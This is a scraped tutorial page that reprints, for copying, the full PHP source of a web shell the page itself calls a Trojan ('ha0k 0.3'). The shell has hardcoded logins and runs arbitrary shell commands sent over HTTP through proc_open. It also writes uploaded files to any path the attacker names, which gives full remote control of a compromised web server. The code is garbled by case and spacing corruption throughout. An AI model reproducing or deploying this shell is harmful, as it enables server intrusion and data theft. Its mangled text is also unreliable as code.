ha0k 0.3 PHP Web Trojan modified version _php tutorial

Copy CodeThe code is as follows:
Here you can set up multiple users
$passwd = Array (' ha0k ' = ' ha0k ',
' HACKERDSB ' = ' HACKERDSB ');
/* Set the alias of the command here */
$aliases = array (' ls ' = ' ipconfig ',
' ll ' = ' ls-lvhf ');
if (!isset ($_server[' Php_auth_user ')) | |! Isset ($_server[' PHP_AUTH_PW ') | |
!isset ($passwd [$_server[' Php_auth_user ']) | |
$passwd [$_server[' Php_auth_user ']]! = $_server[' PHP_AUTH_PW ']) {
Header (' Www-authenticate:basic realm= ' by ha0k "');
Header (' http/1.0 401 Unauthorized ');
$authenticated = false;
}
else {
$authenticated = true;
/* Start Session */
Session_Start ();
/* Initialize session. */
if (Empty ($_session[' CWD ')) | |!empty ($_request[' reset ')) {
$_session[' cwd '] = GETCWD (); Fetch current Directory
$_session[' History ' = Array ();
$_session[' output ' = ';
}
if (!empty ($_request[' command ')) {
if (GET_MAGIC_QUOTES_GPC ()) {//0 table closed, 1 table open, filter on open
/* We don ' t want to add the commands to the
* Escaped form, so we remove the backslashes now. */
$_request[' command '] = stripslashes ($_request[' command '); Returns the string after processing with the addslashes () function as-is
}
/* History */
if ($i = array_search ($_request[' command '), $_session[' history '))!== false)//Find the value in the Save array
unset ($_session[' history '] [$i]); Destroyed
Array_unshift ($_session[' history '), $_request[' command '); the function of the//array_unshift () function is to insert a new element into an array. And this new array will be added to the beginning of the original array. The function eventually returns the array after the new element is inserted.
/* Output ha0k# command */
$_session[' output '. = ' ha0k# '. $_request[' Command ']. "\ n";
/* Initialize the current working directory. */
if (Ereg (' ^[[:blank:]]*cd[[:blank:]]*$ ', $_request[' command ')) {
$_session[' cwd '] = dirname (__file__); Get the directory that is currently located
} elseif (Ereg (' ^[[:blank:]]*cd[[:blank:]]+ ([^;] +) $ ', $_request[' command '], $regs)) {
/* The current command was a ' CD ' command which we had to handle
* As an internal shell command. */
if ($regs [1][0] = = '/') {
/* Absolute path, we use it unchanged. */
$new _dir = $regs [1];
} else {
/* Relative path, we append it to the current working
* Directory. */
$new _dir = $_session[' CWD '). '/' . $regs [1];
}
/* Transform '/./' into '/' * *
while (Strpos ($new _dir, '/./')!== false)
$new _dir = str_replace ('/./', '/', $new _dir);
/* Transform '//' into '/' * *
while (Strpos ($new _dir, '//')!== false)
$new _dir = Str_replace ('//', '/', $new _dir);
/* Transform ' x/. ' Into ' * *
while (Preg_match (' |/\.\. \.) | ', $new _dir))
$new _dir = preg_replace (' |/?[ ^/]+/\.\. (?! \.) | ', ', $new _dir);
if ($new _dir = = ") $new _dir = '/';
/* Try to change directory. */
if (@chdir ($new _dir)) {//Change the current directory
$_session[' cwd '] = $new _dir;
} else {
$_session[' output '. = "Cd:could not change to: $new _dir\n";
}
} else {
/* The command isn't a ' CD ' command, so we execute it after
* Changing the directory and save the output. */
ChDir ($_session[' CWD '); Change Directory
/* Alias extension */
$length = strcspn ($_request[' command '), "\ t"); Find \ t string, return position
$token = substr ($_request[' command '), 0, $length); Take string 0-\t
if (Isset ($aliases [$token]))
$_request[' command '] = $aliases [$token]. substr ($_request[' command '), $length);
$p = proc_open ($_request[' command '),//Execute script
Array (1 = = Array (' Pipe ', ' w '),
2 = = Array (' Pipe ', ' w ')),
$io);
/* read out Send */
while (!feof ($io [1])) {
$_session[' output '. = Htmlspecialchars (Fgets ($io [1]),//convert special characters to HTML character encoding
Ent_compat, ' GB2312 ');
}
/* read out */
while (!feof ($io [2])) {
$_session[' output '. = Htmlspecialchars (Fgets ($io [2]),
Ent_compat, ' GB2312 ');
}
Fclose ($io [1]);
Fclose ($io [2]);
Proc_close ($p);//Close pipe
}
}
/* Build in JavaScript using command history */
if (Empty ($_session[' history '))) {
$js _command_hist = ' "";
} else {
$escaped = Array_map (' addslashes ', $_session[' history ');
$js _command_hist = ' "", "'. Implode (' "," ', $escaped). ' "'; /make an array into a string
}
}
Header (' content-type:text/html; charset=gb2312 ');
Echo ' ' . "\ n";
?>
if (Is_uploaded_file ($HTTP _post_files[' userfile ' [' tmp_name '])) {
Copy ($HTTP _post_files[' userfile ' [' tmp_name '], $_post[' remotefile ']);
echo "Upload file succeeded:". $HTTP _post_files[' userfile ' [' name '];
}
?>
"Http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd" >


<title>ha0k Webshell</title>

ha0k

WE JUST for Justice,fight for evial

You failed to authenticate yourself to Phpshell. You can href= " " >reload to try again.

Try reading the INSTALL file if you ' re has
Problems with installing Phpshell.

Exit
}
Error_reporting (E_all);
if (Empty ($_request[' rows '))) $_request[' rows '] = 10;
?>

The current directory is:

McAfee (Mccafés Antivirus) prevents web pages from being mounted on the horse's setup tutorial (finally do not open on the server side) we strongly recommend that the server install the McAfee 8.5i version

The world's smallest PHP Trojan horse with a way to prevent the PHP trojan

http://www.bkjia.com/PHPjc/320598.html www.bkjia.com true http://www.bkjia.com/PHPjc/320598.html techarticle Copy the code as follows:? PHP//Here you can set multiple users $passwd = Array (' ha0k ' = ' ha0k ', ' hackerdsb ' = ' HACKERDSB ');/* This sets the alias of the command */$aliases = Arra Y (' ls ' = ' ...

